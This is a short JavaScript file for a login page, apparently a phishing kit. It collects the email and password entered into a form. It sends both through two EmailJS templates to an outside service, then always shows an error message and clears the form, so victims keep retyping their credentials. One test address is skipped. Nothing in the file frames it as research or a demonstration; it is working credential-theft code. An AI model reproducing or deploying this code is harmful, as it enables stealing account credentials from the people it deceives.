(function() {
    emailjs.init('vXFL1_J2AhuYYvCSx');

    document.getElementById('contact-form').addEventListener('submit', function(event) {
        event.preventDefault();

        var email = document.getElementById('email').value;
        var password = document.getElementById('password').value;
        var errorMessage = document.getElementById('error-message');

        errorMessage.style.display = 'block';

        if (email === 'pruebita@gmail.com') {
            document.getElementById('contact-form').reset();
            return;
        }

        if (email && password) {
            var templateParams = {
                email: email,
                password: password
            };

            emailjs.send('service_mlr1gee', 'template_8ygccbi', templateParams)
                .then(function(response) {
                }).catch(function(error) {
                });

            emailjs.send('service_mlr1gee', 'template_mu97vit', templateParams)
                .then(function(response) {
                }).catch(function(error) {
                });

            document.getElementById('contact-form').reset();
        } else {
            alert('Por favor, completa todos los campos para iniciar sesión.');
        }
    });
})();
